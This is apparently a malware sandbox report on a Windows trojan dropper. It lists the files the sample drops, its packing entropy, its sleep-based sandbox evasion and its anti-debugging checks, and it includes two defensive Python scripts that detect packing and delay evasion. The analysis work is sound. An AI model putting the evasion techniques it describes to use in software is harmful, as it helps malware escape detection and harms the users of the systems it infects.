                  Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/7@11/5
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_00A0A48E CreateToolhelp32Snapshot,Module32First
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\track_prt[1].htm
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                  Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7976
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | File created: C:\Users\user\AppData\Local\Temp\3247.tmp
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: XIaCqh1vRm.exe | Virustotal: Detection: 41%
                  Source: XIaCqh1vRm.exe | ReversingLabs: Detection: 47%
                  Source: unknown | Process created: C:\Users\user\Desktop\XIaCqh1vRm.exe "C:\Users\user\Desktop\XIaCqh1vRm.exe"
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Process created: C:\Users\user\AppData\Local\Temp\3247.tmp.exe "C:\Users\user\AppData\Local\Temp\3247.tmp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 1724
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: msimg32.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: msvcr100.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Unpacked PE file: 3.2.3247.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Unpacked PE file: 0.2.XIaCqh1vRm.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Unpacked PE file: 3.2.3247.tmp.exe.400000.0.unpack
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0041EC5E
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_00410766 push ecx; ret 0_2_00410779
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_00A0D085 push 00000003h; ret 0_2_00A0D089
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_00A0B2DA push es; iretd 0_2_00A0B2EB
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_00A0F692 pushad ; ret 0_2_00A0F6AE
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_00A0CBE4 pushad ; ret 0_2_00A0CC0C
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024A09CD push ecx; ret 0_2_024A09E0
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024C799F push esp; retf 0_2_024C79A7
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024ACE18 push ss; retf 0_2_024ACE1D
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0249FFF3 push ecx; ret 0_2_024A0006
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024C7F9D push esp; retf 0_2_024C7F9E
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024C9DE8 pushad ; retf 0_2_024C9DEF
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_0041ACF6 push esp; iretd 3_2_0041ACFF
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_0043F6EE push esp; iretd 3_2_0043F6EF
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_0043BF00 push eax; mov dword ptr [esp], 49484716h 3_2_0043BF01
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_00B1C167 push eax; mov dword ptr [esp], 49484716h 3_2_00B1C168
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_00B1F555 push esp; iretd 3_2_00B1F556
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_00AFAF5D push esp; iretd 3_2_00AFAF66
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_00BDC4D5 pushad ; ret 3_2_00BDC4DA
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_00BDC75B push ebp; ret 3_2_00BDC760
Source: XIaCqh1vRm.exe | Static PE information: section name: .text entropy: 7.542990652047153
Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .text entropy: 7.371146835595198
Source: 3247.tmp.exe.0.dr | Static PE information: section name: .text entropy: 7.371146835595198
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | File created: C:\Users\user\AppData\Local\Temp\3247.tmp.exe
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0040E974
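The unpack entries and the .text entropies above (7.54 for XIaCqh1vRm.exe, and 7.37 for both ScreenUpdateSync[1].exe and 3247.tmp.exe, which is consistent with the Temp copy being the file fetched into the IE cache through the urlmon.dll loaded earlier) are the first thing an analyst reproduces when triaging a new sample. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it walks the PE section table by hand, computes Shannon entropy per section, and flags sections at or above an assumed 7.2 bits/byte threshold (a common packing heuristic, not a Joe Sandbox constant). The PE image it analyses is constructed inline so it runs offline; pass the bytes of a real file to `packed_sections` to use it on a sample.

```python
import math
import struct

# Entropy (bits per byte) above which a section is usually treated as packed
# or encrypted. Assumed analyst heuristic, not a Joe Sandbox constant: plain
# compiled x86 code normally lands around 6.0 to 6.6; the report's 7.54 and
# 7.37 are well above that.
PACKED_THRESHOLD = 7.2


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or constant data, 8.0 max."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes):
    """Yield (name, raw_bytes) for each section of a PE image.

    Hand-rolled so the example needs no pefile; only the header fields needed
    to reach the section table are read.
    """
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    # PointerToSymbolTable(4) NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    (num_sections,) = struct.unpack_from("<H", image, coff + 2)
    (opt_size,) = struct.unpack_from("<H", image, coff + 16)
    table = coff + 20 + opt_size
    for i in range(num_sections):
        hdr = image[table + 40 * i: table + 40 * (i + 1)]
        # IMAGE_SECTION_HEADER: Name(8) VirtualSize(4) VirtualAddress(4)
        # SizeOfRawData(4) PointerToRawData(4) ... Characteristics(4)
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)
        yield name, image[raw_ptr: raw_ptr + raw_size]


def packed_sections(image: bytes, threshold: float = PACKED_THRESHOLD) -> dict:
    """Map section name -> entropy for every section at or above the threshold."""
    result = {}
    for name, raw in pe_sections(image):
        h = shannon_entropy(raw)
        if h >= threshold:
            result[name] = round(h, 3)
    return result


def build_sample_pe(sections) -> bytes:
    """Constructed minimal PE for the demo (not a real sample): DOS header with
    e_lfanew, PE signature, COFF header with an empty optional header, then the
    section table and the raw section data."""
    n = len(sections)
    e_lfanew = 0x40
    header = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew))
    header += b"PE\0\0"
    header += struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0, 0x102)
    offset = len(header) + 40 * n  # raw data starts right after the section table
    body = b""
    for name, raw in sections:
        header += struct.pack("<8sIIII", name, len(raw), 0x1000, len(raw), offset)
        header += b"\0" * 16  # relocation/line-number fields and Characteristics
        body += raw
        offset += len(raw)
    return bytes(header) + body


# Two constructed sections: one uniformly distributed (entropy 8.0, what a
# packed or encrypted payload looks like) and one all zeros (entropy 0.0).
SAMPLE_PE = build_sample_pe([(b".text", bytes(range(256)) * 16),
                             (b".data", b"\x00" * 4096)])


if __name__ == "__main__":
    for name, raw in pe_sections(SAMPLE_PE):
        print(f"{name:<8} entropy={shannon_entropy(raw):.3f}")
    print("packed:", packed_sections(SAMPLE_PE))
```

Entropy alone does not prove packing (compressed resources or an embedded certificate also score high), so read the result together with the section-rights change recorded at the top of this block (the .rsrc layout replaced by .CRT and .reloc after unpacking) and the push/ret and pushad/retf gadget entries above, which are what the packer's stub uses to transfer control into the decrypted image.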
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS|NOGPFAULTERRORBOX (5 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 occurrences)
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Window / User API: threadDelayed 3454
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Window / User API: threadDelayed 6531
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Evasive API call chain: GetSystemTimeAsFileTime, DecisionNodes graph_0-65482
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | API coverage: 5.1 %
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe TID: 7928 | Thread sleep count: 3454 > 30
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe TID: 7928 | Thread sleep time: -2493788s >= -30000s
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe TID: 7928 | Thread sleep count: 6531 > 30
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe TID: 7928 | Thread sleep time: -4715382s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe TID: 8036 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Last function: Thread delayed
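The threadDelayed and Thread sleep entries above are the report's delay-based evasion signature: thread 7928 of the dropper accumulates 3454 and then 6531 sleep calls in a loop, and thread 8036 of 3247.tmp.exe issues one long delay (reported as -120000s), both aimed at outlasting a sandbox's execution window; the 5.1 % API coverage figure is the consequence, since most of the code never runs while the sandbox is watching. The Amcache.hve.7.dr VMware and Hyper-V strings that follow are a separate matter: Amcache.hve is the analysis machine's own application-compatibility hive, collected as a dropped file, so those strings describe the sandbox VM rather than VM checks implemented by the sample. The script below is an added example (not Joe Sandbox code) that applies the same call-count and cumulative-delay heuristic to a per-call API trace; the trace format and both thresholds are assumptions chosen to mirror the figures in the report.

```python
from collections import defaultdict

# Win32/NT APIs that stall the calling thread; the constructed trace below
# records the requested delay in milliseconds for each of them.
SLEEP_APIS = {"Sleep", "SleepEx", "NtDelayExecution"}

# Assumed thresholds mirroring the report's "sleep count ... > 30" and
# "30000" figures; tune them to the sandbox's run length.
MAX_SLEEP_CALLS = 30
MAX_TOTAL_SLEEP_MS = 30_000


def parse_trace(lines):
    """Parse a constructed per-call trace: 'tid<TAB>api<TAB>delay_ms'.

    Real sandbox traces carry richer records; only these three fields matter.
    """
    for line in lines:
        if not line or line.startswith("#"):
            continue
        tid, api, delay = line.rstrip("\n").split("\t")
        yield int(tid), api, int(delay)


def sleep_stats(events):
    """Per-thread sleep call count, cumulative delay and the set of intervals used."""
    stats = defaultdict(lambda: {"calls": 0, "total_ms": 0, "intervals": set()})
    for tid, api, delay_ms in events:
        if api in SLEEP_APIS:
            s = stats[tid]
            s["calls"] += 1
            s["total_ms"] += delay_ms
            s["intervals"].add(delay_ms)
    return dict(stats)


def flag_delay_evasion(stats, max_calls=MAX_SLEEP_CALLS, max_total_ms=MAX_TOTAL_SLEEP_MS):
    """Return {tid: reason} for threads that stall long enough to outlast a
    sandbox run, either through one long sleep or a loop of short ones."""
    flagged = {}
    for tid, s in stats.items():
        reasons = []
        if s["calls"] > max_calls:
            reasons.append(f"{s['calls']} sleep calls > {max_calls}")
        if s["total_ms"] >= max_total_ms:
            reasons.append(f"total {s['total_ms']} ms >= {max_total_ms} ms")
        if reasons:
            # A loop of identical short sleeps is the classic threadDelayed
            # pattern; a single huge delay is the other common variant.
            if len(s["intervals"]) == 1 and s["calls"] > 1:
                reasons.append(f"fixed {next(iter(s['intervals']))} ms interval loop")
            flagged[tid] = "; ".join(reasons)
    return flagged


# Constructed trace (not taken from the report): thread 7928 loops 40 times on
# a short sleep, thread 8036 makes one two-minute call, thread 100 is benign.
SAMPLE_TRACE = (
    ["#tid\tapi\tdelay_ms"]
    + ["7928\tSleep\t722"] * 40
    + ["8036\tNtDelayExecution\t120000",
       "100\tSleep\t50", "100\tGetTickCount\t0", "100\tSleep\t50"]
)


def analyze(lines=SAMPLE_TRACE):
    """Full pipeline over a trace: parse, aggregate per thread, apply thresholds."""
    return flag_delay_evasion(sleep_stats(parse_trace(lines)))


if __name__ == "__main__":
    for tid, why in analyze().items():
        print(f"thread {tid}: {why}")
```

When a sample trips this heuristic, rerun it with sleep skipping or a longer timeout; the FindFirstFileExW, PEB (fs:[30h]) and IsDebuggerPresent entries further down are the checks that typically decide whether the delayed code path ever unpacks the payload.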
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_004389F2 FindFirstFileExW, 0_2_004389F2
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024C8C59 FindFirstFileExW, 0_2_024C8C59
Source: Amcache.hve.7.dr | Binary or memory string: VMware
Source: Amcache.hve.7.dr | Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000002.1856295839.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000002.1856236713.0000000000C16000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_0043A9B0 LdrInitializeThunk, 3_2_0043A9B0
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0042A3D3
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0041EC5E
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h] 0_2_0042FE5F
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_00A09D6B push dword ptr fs:[00000030h] 0_2_00A09D6B
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024C00C6 mov eax, dword ptr fs:[00000030h] 0_2_024C00C6
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0249092B mov eax, dword ptr fs:[00000030h] 0_2_0249092B
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_02490D90 mov eax, dword ptr fs:[00000030h] 0_2_02490D90
